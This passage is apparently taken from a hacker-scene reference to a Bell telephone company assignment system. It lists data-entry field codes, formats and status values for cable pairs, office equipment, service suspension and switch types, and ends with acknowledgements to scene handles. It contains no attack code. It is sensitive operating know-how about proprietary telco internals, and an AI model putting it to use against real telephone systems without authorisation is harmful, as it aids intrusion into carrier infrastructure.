| CE=Equipment Shortage | |
| CF=Lack of Facility | |
| CL=Plant Load | |
| CO=General Company Reasons | |
| C1-C5-Additional Company Reasons | |
| SA=Subscriber Access | |
| SL=Subscriber Requested Later Date | |
| SO=General Subscriber Reasons | |
| SR=Subscriber Not Ready | |
| S1-S5=Additional General Subscriber Reasons | |
| HRS Hours Prefix | |
| HRS XX | |
| XX=01-24 | |
| HT Hunt-to Telephone Number | |
| HT XXX-XXXX | |
| XXX-XXXX=Telephone Number | |
| HTG Hunt-to Group Number | |
| HTG Y-XXXX | |
| Y=Alphanumeric Control Group | |
| XXXX=Numeric Group Number | |
| HTX Hunt-to X Number | |
| HTX XXX-YYXX of | |
| HTX XXX-YXX | |
| Y=Alphanumeric | |
| X=Numeric | |
| INIT Allocation Table Initalization | |
| INIT | |
| (No Data Entry) | |
| ITM Cable Pair Item Number | |
| ITM XX | |
| XX=Two Numeric Characters | |
| JL Jumper Length | |
| JL XXX | |
| XXX=Maximum of 3 Numeric Characters | |
| JR Jeopardy Reason | |
| JR XX | |
| A1=Assignment Error on CP | |
| A2=Assignment Error on OE | |
| A3=Assignment Error on TN | |
| A4-A9=Other Assignment Error | |
| C1=No SSWO for Circuit Design Group | |
| C2-C9=Local Code for Circuit Design Group | |
| E1-E9=No ESS Translations | |
| IB=No Installation Go-ahead for Business | |
| IC=No Installation Go-ahead for Coin | |
| ID=No Installation Go-ahead for Data | |
| IR=No Installation Go-ahead for Residence | |
| IS-No Installation Go-ahead for Special | |
| I1-I4=Local Codes foir No Installation Go-ahead | |
| RB=Business RSB | |
| RC=Coin RSB | |
| RD=Data RSB | |
| RR=Residence RSB | |
| RS=Special RSB | |
| R1-R4=Local Use for RSB | |
| LC Output Line Count | |
| LC XXXX | |
| XXXX=0-9999 | |
| LC Line Count | |
| LC XXX | |
| XXX=0-999 | |
| LC Pending Service Order Count | |
| LC | |
| (No Data Entry) | |
| LCC Line Class Code | |
| LCC XXX | |
| XXX Maximum of 3 Alphanumeric Characters | |
| LD Loading Division | |
| LD XX | |
| XX=Two Numeric Characters | |
| LDN Listed Directory Number | |
| LDN XXX-XXXX | |
| XXX-XXXX=Telephone Number | |
| LF Load Factor | |
| LF XX | |
| XX=1-10 | |
| LIM Less Than the Specified Number of Pairs | |
| LIM XX | |
| XX=0-50 | |
| LIM High Limit on Number of Specified Status Pairs in a Complement | |
| LIM XX | |
| XX=0-50 | |
| LIM Low Limit on Number of Spare Line Equipment in Vertical Files | |
| LIM XX | |
| LIM=1-10 | |
| LLC Low Load Group Count | |
| LLC XXXX | |
| XXXX=0-9999 | |
| LOC Location | |
| LOC FXXYYY | |
| F=The Letter "F" | |
| XX=Alphanumeric | |
| YYY=001-999 | |
| LP Loop Range | |
| LP XXX;XXX | |
| XXX;XXX=Six Numeric Characters | |
| LS List New Pending Cable Transfers | |
| LS XXX | |
| XXX=NEW | |
| LTI Loop Termination Identifier | |
| LTI XXX | |
| XXX=Three Alphanumeric Characters | |
| MASK Office Equipment Mask | |
| MASK OE ID | |
| ID=XXX-XXX-XXX =1ESS | |
| ID=XXX-XXXX =2ESS | |
| ID=XXX-XXXX =3ESS | |
| ID=XXXX-XXX-XX =5ESS | |
| ID=XXXX-XX-XX =5ESS | |
| ID=XXXX-X-XXXX =RSS | |
| ID=XXXX-XXX-XX =1XB | |
| ID=XXXX-XXXX-XX =1XB | |
| ID=XXX-XX-XX =5XB | |
| ID=XXXX-XXX =SXS | |
| ID=XXX-X-XX-X =DMS-10 | |
| ID=XXX-X-XX-XX -DMS-100 | |
| X=Alphanumeric | |
| MAT Manual Assistance Tag | |
| MAT XXX | |
| XXX=YES or NO | |
| MAX Maximum Percentage Value of Entity Fill or Maximum CCS Value | |
| MAX XXX | |
| XXX=Maximum of 3 Numeric Characters | |
| MBL Mini-bridge Lifter Tag | |
| MBL XX | |
| Y=MBL Working on CP | |
| N=CP Can't Support MBL | |
| EQ=CP has MBL Capabilities | |
| MC Marker Class of Service | |
| MC XX | |
| XX=Two Alphanumeric Characters | |
| MF Recent Change Message Format | |
| MF XXXX | |
| NEW=RX:LINE:messages | |
| OUT=RC:LINE:OUT:messages | |
| CHG=RC:LINE:CHG:messages | |
| SUSP=RC:LINE:CHG:messages of suspended service | |
| MF Jumper Listing for MDF | |
| MF XXX | |
| NEW=Running Jumper Listing | |
| DJ=Dead Jumper Listing | |
| MF Message Format When Completing Transfer Circuits with TOC | |
| MF XXX | |
| ALL=Message is Printed for Every Circuit in Range | |
| ERR=Message Printed Only for Circuits not Completed | |
| MF Message Format for Dial Transfer Number Lists | |
| MF XXX | |
| GVR=Transaction GFR Output Format, One Facility per Line | |
| LVT=Line Verification Test Format | |
| TLC=Two-line Condensed Format | |
| MG Marker Group Number | |
| MG X | |
| X=0-9 | |
| MIN Minimum Percentage Value of Entity Fill or Minimum CCS Value | |
| MIN XXX | |
| XXX=Maximum of 3 Numeric Characters | |
| MLP Multi-loop Resistance Zone Threshold | |
| MLP XX | |
| XX=Two Numeric Characters | |
| MOD Module Number | |
| MOD XXX | |
| XXX=Three Numeric Characters | |
| MODE Integrated SLC No. 5ESS Mode | |
| MODE X | |
| 1=5 T1 Carrier Channels | |
| 2=3 T1 Carrier Channels | |
| MPN Master Work Package Number | |
| MPN XXXX | |
| XXXX=1-9999 | |
| MR Message Register | |
| MR XXXXXX | |
| XXXXXX=Maximum of 6 Alphanumeric Characters | |
| MRO Message Register Option | |
| MRO XXX | |
| XXX=YES or NO | |
| MT Master Record Tape Unit Number or Tape Drive to Write | |
| MT X | |
| X=Numeric | |
| MTR Tape Drive to Read | |
| MTR X | |
| X=Numeric | |
| MTW Tape Drive to Write | |
| MTW X | |
| X=Numeric | |
| NAR NAC Assignment Review | |
| NAR XXX | |
| XXX=Maximum of 3 Numeric Characters | |
| NGF Number Group Frame for 5XB | |
| NGF XXX | |
| XXX=Three Numeric Characters | |
| NNX Telephone Exchange Code | |
| NNX XXX | |
| XXX=THree Numeric Characters | |
| NOE Number of OEs to be Assigned | |
| NOE X | |
| X=0 or 1 | |
| NPA Area Code and Exchange Number | |
| NPA XXXXXX | |
| XXXXXX=Six Alphanumeric Characters | |
| NRM Normalizing CCS VAlue | |
| NRM XX | |
| XX=0-99 | |
| NTN Number of TNs to be Assigned | |
| NTN X | |
| X=0 or 1 | |
| OA Line Equipment Assignment Option | |
| OA X | |
| Y=Yes | |
| N=No | |
| OC Order Category | |
| OC XXX | |
| ACT=Assignment Change Ticket | |
| ALL=All OE Load Factors | |
| CPC=Special Service | |
| FM=Count Since OE Input Features Occurrences | |
| FO=Count All OE Input Feature Occurrences | |
| HOT=Frame Ouput-urgent | |
| JR=Jeopardy Reason | |
| OCS Old Class of Service | |
| OCS XXXXXX | |
| XXXXXX=Maximum of 6 Alphanumeric Characters | |
| OD Output Device | |
| OD XXXX | |
| TT=Send Output to Current Terminal | |
| TTXX=Send Output to Specified Terminal XX | |
| MTX=Send Output to Magnetic Tape X | |
| OE Office Equpiment Number | |
| OE ID | |
| (See MASK) | |
| OGO Outgoing Only Trunk | |
| OGO XXX | |
| XXX=Maximum of 4 Numeric Characters | |
| OPT Party Assignment Option | |
| OPT X | |
| 1=Assign Multi-party Customers to Spare Party Equipment | |
| 2=Assign Multi-party Customer to Partially Equipped Party Equipment | |
| 3=Assign Only One Multi-Party Customer to each Single Party Equipment | |
| ORD Service or Work Order | |
| ORD XX...XX | |
| XX...XX=Maximum of 20 Alphanumeric Characters | |
| OT Service or Work Order Type | |
| OT XXX | |
| BT=Background Transfer | |
| CD=Complete Disconnect | |
| CH=Changed | |
| CIO=Company Initiated Orders | |
| F="FROM" | |
| LET=Line Equipment Transfers | |
| LST=Line and Station Transfers | |
| MCE=Maintenance Change by LAC | |
| MCR=Maintenance Change by Repair | |
| MCT=All Maintenance Changes | |
| NC=New Connect | |
| R=Remarks | |
| REA=Pending Reassociation | |
| SW=Swap | |
| T="TO" | |
| PBX Private Branch Exchange | |
| PBX XXXX | |
| XXXX=Maximum of 4 Numeric Characters | |
| PCID Primary Circuit Identification | |
| PCID XX...XX | |
| XX...XX=Maximum of 61 Alphanumeric Characters | |
| PKT Picket Fence Values | |
| PKT XXX.X,...,XXX.X | |
| XXX.X,...,XXX.X=Nine sets of Four Numeric Characters or | |
| N=No New Values | |
| PL Private line Circuit Number | |
| PL XX...XX | |
| XX...XX=Maximum of 61 Alphanumeric Characters | |
| PNL PREMIS Number List for TN | |
| PNL XX...XX | |
| XX...XX=Maximum of 12 Alphanumeric Characters | |
| POP Line Equipment Print Option | |
| POP XXX | |
| CNC=Concentrator-1ESS, 2ESS, 3ESS, RSS | |
| CNG=Concentrator Group-2ESS, 3ESS | |
| HG=Horizontal Group-5XBAR | |
| IM=Interface Module-5ESS | |
| LFG=Line Finder Group-SXS | |
| LLF=Line Link Frame-5XBAR | |
| LLN=Line Link Net-1ESS | |
| LTN=Line Trunk Net-2ESS | |
| LU=Link Unit Module-5ESS | |
| QC=Quarter Choice-1XBAR | |
| SW=Switch-1XBAR | |
| VF=Vertical FIle-5XBAR | |
| PR Cable Pair ID | |
| PR YXXX | |
| Y=Alphanumeric | |
| XXX=Numeric | |
| PRI Frame Priority | |
| PRI XX | |
| XX=Two Numeric Characters | |
| PRP Permanent Cable Pair Remarks | |
| PRP XX...XX | |
| XX...XX=Maximum of 14 Alphanumeric Characters | |
| PRZ Preferred Rate Zone | |
| PRT X | |
| X=Numeric | |
| PS Previously Published/Non-published Facility Indicator | |
| PS X | |
| N=Non-Published | |
| !=Published | |
| PT Package Time | |
| PT XXX | |
| XXX=Three Numeric Characters | |
| PTY Party Number or Position | |
| PTY X | |
| X=1-4 | |
| PTY Party Indicator | |
| PTY X | |
| R=Reserved | |
| O=Open | |
| PWC PREMIS Wire Center | |
| PWC XX...XX | |
| XX...XX=Maximum of 8 Alphanumeric Characters | |
| PWC Print Work Code | |
| PWC XXX | |
| NBT=No Back Tap | |
| COM=Frame Complete | |
| PBT=Print Back Tap | |
| RCT=Place Heat Coils on "TO" Pair | |
| RBT=Remove Back Tap | |
| RCF=Remove Heat Coils on "FROM" Pair | |
| VBT=Verify Back Tap | |
| USX=Locally Defined Codes (X=1-4) | |
| RAP Rotary Assignment Priority | |
| RAP X | |
| X=Numeric | |
| RCT Recent Change Type | |
| RCT XX | |
| 1=1ESS Office | |
| 1A=1AESS Office | |
| 2=2ESS (LO1) | |
| 2E=2ESS (EF1 and EF2) | |
| 3=3ESS | |
| 5T=5ESS | |
| RCW Recent Change Keyword | |
| RCW XX...XX | |
| XX...XX=Maximum of 20 Alphanumeric Characters | |
| RD Release Date | |
| RD MM-DD-YY | |
| MM=Month | |
| DD=Day | |
| YY=Year | |
| RDG Message Register Reading | |
| RDG XXXX | |
| XXXX=Four Numeric Characters | |
| REC Record File Name and Number | |
| REC FFXXXXXX | |
| FF=File Name (Alphanumeric) | |
| XXXXXX=Record Number (Maximum of 6 Numeric Characters) | |
| REP Reprint Option | |
| REP X | |
| Y=Yes | |
| N=No | |
| RESP Send a Solicited Response | |
| RESP X | |
| S=Solicited Response | |
| REW Rework Status | |
| REW X | |
| Y=Yes | |
| N=No | |
| RLF Re-using DIPs Upper Bound Load Factor | |
| RLF X | |
| X=1-9 | |
| RLO Automatic Relay Assignment Present | |
| RLO X | |
| Y=Yes | |
| N=No | |
| RLY Miscellaneous Relay | |
| RLY XX...XX | |
| XX...XX=Maximum of 10 Alphanumeric Characters | |
| RMK Remarks on Orders | |
| RMK XX...XX | |
| XX...XX=Maximum of 28 Alphanumeric Characters | |
| RMKG Hunt Group Remarks | |
| RMKG XX...XX | |
| XX...XX=Maximum of 30 Alphanumeric Characters | |
| RMKO Remarks on Office Equipment | |
| RMKO XX...XX | |
| XX...XX=Maximum of 12 Alphanumeric Characters | |
| RMKP Remarks on Cable Pair | |
| RMKP XX...XX | |
| XX...XX=Maximum of 14 Alphanumeric Characters | |
| RMKT Remarks on Telephone Number | |
| RMKT XX...XX | |
| XX...XX=Maximum of 14 Alphanumeric Characters | |
| RNO RSS Subentity Number | |
| RNO XX | |
| XX=01-63 | |
| RTI Route Index | |
| RTI XXXX | |
| XXXX=Maximum of 4 Numeric Characters | |
| RTYP Relay Type | |
| RTYP XXX | |
| TBA=Tens Block Auxiliary | |
| SC=Sleeve Connect | |
| AR=Advance | |
| RTZ Rate Zone | |
| RTZ X | |
| X=Numeric | |
| RW Recent Change Work | |
| RW X | |
| N=Recent Change Message not Required | |
| C=Recent Change Coordination Required | |
| RZ Resistance Zone | |
| RZ XX | |
| XX=Two Numeric Characters | |
| SBS Sub-status | |
| SBS X | |
| A=Area Transfer | |
| C=Cut Through | |
| D=Dedicated | |
| L=Cut Through and Dedicated | |
| !=Blank | |
| SC Sleeve Connect Relay | |
| SC SYY-ZZZ | |
| S=Marker Group (Numeric) | |
| YY=Number Group Frame (Numeric) | |
| ZZZ=Relay Number (Numeric) | |
| SE Special Service Equipment Number | |
| SE XX...XX | |
| XX...XX=Maximum of 52 Alphanumeric Characters | |
| SET Single Entity Tag | |
| SET X | |
| Y=CP is Served by a Single Entity on a Single Frame | |
| !=CP Can be Served by More Than One Entity | |
| SG Service Segment | |
| SG X | |
| B=Business | |
| C=Coin | |
| D=Data | |
| R=Residence | |
| S=Special | |
| SGN Common Language Segment Number | |
| SGN XXX | |
| XXX=Maximum of 3 Alphanumeric Characters | |
| SIS Special Identifying Telephone Number Supplement | |
| SIS XXXX | |
| XXXX=Maximum of 4 Numeric Characters | |
| SIT Special Identifying Telephone Number | |
| SIT XXX-YYY-XXXX | |
| X=Numeric | |
| Y=Numeric | |
| SK Skip Option | |
| SK X | |
| X=0 or 2-9 | |
| SN Sequence Number | |
| SN XXX | |
| XXX=1-999 | |
| SOB Service Observing Tag | |
| SOB XXX | |
| XXX=YES or NO | |
| SS Suspension Status | |
| SS XX | |
| DB=Deny Both Ways | |
| DI=Deny Incoming | |
| DO=Deny Outgoing | |
| RS=Restore Suspended Circuit | |
| SB=Suspend Both Ways | |
| SD=Season Disconnect | |
| SI=Suspend Incoming | |
| SO=Suspend Outgoing | |
| DX=Deny Toll Access Tervice | |
| SSV Suspend Service Type | |
| SSV XX | |
| DO=Deny Outward Service | |
| DB=Deny Both Outward and Inward Service | |
| DX=Deny Toll Access Service | |
| RS=Restore Denied Service | |
| STAT Order Status | |
| STAT XX | |
| AC=Pending With no Framd or Installation Completion | |
| FC=Pending With Frame Completion but no Installation Completion | |
| IC=Pending with Installation Complation but no Frame Completion | |
| CC=Completed Orders | |
| CA=Canceled Orders | |
| STAT Facility Status | |
| STAT XX | |
| AS=All Spare | |
| EX=Excluded | |
| PC=Pending Connect | |
| RS=Reserved | |
| SF=Spare Facility | |
| UK=Unknown | |
| WK=Working | |
| STAT Load Group Status | |
| STAT XX | |
| EX=Blocked from all Assignments | |
| FU=Open for Dial Transfer Assignments Only | |
| PS=Pseudo LEN Assignments Only | |
| SO=Open for Service Orders and Work Orders Only | |
| WK=Open for All Assignments | |
| STO Line Equipment Status | |
| STO XX | |
| AW=All Working | |
| MS=Miscellaneous | |
| OF=Official | |
| TJ=Trunk and Junctor | |
| TS=Test | |
| WK=Working | |
| PD=Pending Disconnect | |
| PK Pending Disconnect/Pending New Connect | |
| AS=All Spare | |
| EX=Excluded | |
| LI=Left-in Disconnect | |
| RS=Reserved | |
| SF=Spare | |
| UK=Unknown | |
| PC=Pending Connect | |
| STP Cable and Pair Status | |
| STP XX | |
| AL=All Pairs | |
| AD=All Defective | |
| AP=All Provisioned | |
| AW=All Working | |
| DC=Designed Circuit | |
| DI=Defective (I=1-9) | |
| DM=Designed + SSM | |
| DP=Designed + SSP | |
| SM=Special Safeguard Measures | |
| SP=Special Safeguard Protection | |
| SS=Special Status | |
| WK=Working | |
| AS=All Spare | |
| EX=Excluded | |
| LI=Left-in Disconnect | |
| RS=Reserved | |
| SF=Spare | |
| UK=Unknown | |
| PC=Pending Connect | |
| PD=Pending Disconnect | |
| STT Telephone Number Status | |
| STT XX | |
| AU=Auxiliary | |
| AW=All Working | |
| MS=Miscellaneous | |
| NP=Non-published | |
| OF=Official | |
| TJ=Trunk and Junctor | |
| TS=Test | |
| WK=Working | |
| AS=All Spare | |
| AV=Available | |
| CM=Changed-Machine Intercept | |
| CO=Changed-Operator Intercept | |
| DM=Disconnected-Machine Intercept | |
| DO=Disconnected-Operator Intercept | |
| EX=Excluded | |
| RS=Reserved | |
| SF=Spare | |
| UK=Unknown | |
| PC=Pending Connect | |
| PD=Pending Disconnect | |
| PK=Pending Disconnect/Pending New Connect | |
| SUBL Sublet Service | |
| SUBL XXX-XXXX | |
| XXX-XXXX=Telephone Number | |
| SWC Set Work Code | |
| SWC XXX | |
| (See Print Work Code) | |
| SWG Switch Group | |
| SWG X | |
| X=0-2 | |
| SYS Machine Number | |
| SYS XX...XX | |
| XX...XX=Maximum of 12 Alphanumeric Characters | |
| TA Transfer Assembly | |
| TA X | |
| Y=Yes | |
| N=No | |
| TAP Touchtone Assignment Priority Number | |
| TAP X | |
| X=Numeric | |
| TBA TBA Relay | |
| TBA XYY-ZZZ | |
| X=Marker Group Number (Numeric) | |
| YY=Number Group Frame (Numeric) | |
| ZZZ=Relay Number (Numeric) | |
| TBS TBS Relay | |
| TBS XZ-NN | |
| X=Marker Group Number (0-9) | |
| Z=Relay Number (0-3) | |
| NN=Ringing Combination (01-16) | |
| TC TO Cable | |
| TX XX...XX | |
| XX...XX=Maximum of 10 Alphanumeric Characters | |
| TER Terminal | |
| TER XXXX | |
| XXXX=Maximum of 4 Numeric Characters | |
| TER Terminal Number | |
| TER Y-XXXX-ZZZZ | |
| Y=Control Group (Alphanumeric) | |
| XXXX=Group Number (Numeric) | |
| ZZZZ=Terminal Number (Numeric) | |
| THG Thousands Group | |
| THG X or | |
| THG XXXX | |
| X=0-9 | |
| XXXX=0000,1000,...,9000 | |
| TK Trunk Cable and Pair Number | |
| TK YYYYYY-XXXX | |
| YYYYYY=Cable ID (Maximum of 6 Alphanumeric Characters) | |
| XXXX=Cable Pair ID (Maximum of 4 Numeric Characters) | |
| TLI Telephone Line Identifier | |
| TLI XXX-YYY-XXXX | |
| X=Numeric | |
| Y=Alphanumeric | |
| TN Telephone Number | |
| TN XXX-XXXX | |
| XXX-XXXX=Telephone Number | |
| TOM Two or More Non-pending, Non-party Filtered Circuit Facilities | |
| TOM XX | |
| CP=Cable Pair | |
| TN=Telephone Number | |
| OE=Office Equipment | |
| TP Tie Pair | |
| TP YY...YY-XXXX | |
| YY...YY=Cable ID (Maximum of 10 Alphanumeric Characters) | |
| XXXX=Tie Pair ID (Maximum of 4 Numeric Characters) | |
| TPR Taper Code | |
| TPR XXXXXX | |
| XXXXXX=Maximum of 6 Alphanumeric Characters | |
| TRE Transmission Equipment | |
| TRE XX...XX | |
| XX...XX=Maximum of 17 Alphanumeric Characters | |
| TT Telephone Number Type | |
| TT X | |
| B=POTs Hunting | |
| C=Coin | |
| G=Complex Service (Direct Inward Dialing, Radio Common Carrier, etc) | |
| O=Official | |
| Q=Centrex | |
| X=POTx Non-hunting | |
| TTA Terminating Traffic Area | |
| TTA XXX | |
| XXX=Maximum of 3 Alphanumeric Characters | |
| TYP Switching Type | |
| TYP XXX | |
| 1ES=Number 1ESS | |
| 2ES=Number 2ESS | |
| 3ES=Number 3ESS | |
| 5ES=Number 5ESS | |
| RSS=Remote Switching System | |
| 1XB=Number 1 Cross-bar | |
| 5XB=Number 5 Cross-bar | |
| SXS=Step-by-step | |
| DMX=DMS-10 | |
| DMC=DMS-100 | |
| US USOC | |
| US XXXXX | |
| XXXXX=Maximum of 5 Alphanumeric Characters | |
| USE Entity Usage | |
| USE X | |
| G=Growth | |
| S=Stable | |
| VAL Minimum Valid Hours for Entity Data | |
| VAL XX | |
| XX=1-99 | |
| WC Wire Center | |
| WC XX | |
| XX=Alphanumeric | |
| WL Work Location | |
| WL Y | |
| Y=1-8 or | |
| WL XXX | |
| ADM=Administrative | |
| ACT=Assignment Change Ticket | |
| CPC=Special Service Circuits | |
| MCT=Maintenance Change Tickets | |
| WPN Work Package Number | |
| WPN XXXX | |
| XXXX=1-9999 | |
| WPT Work Package Type | |
| WPT XXX | |
| XXX=Maximum of 3 Alphanumeric Characters | |
| XN "X" Number | |
| XN XXX-YYXX or | |
| XN XXX-YXX | |
| X=Numeric | |
| Y=Alphanumeric | |
| ZN Zone Location | |
| ZN XXX | |
| XXX=001-999 | |
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| ACKNOWLEDGEMENTS | |
| Skinny Puppy for refreshing my memory | |
| The Urvile for the "$*" file and further usage of echo | |
| Bell Laboratories OPA-1Y600-01 | |
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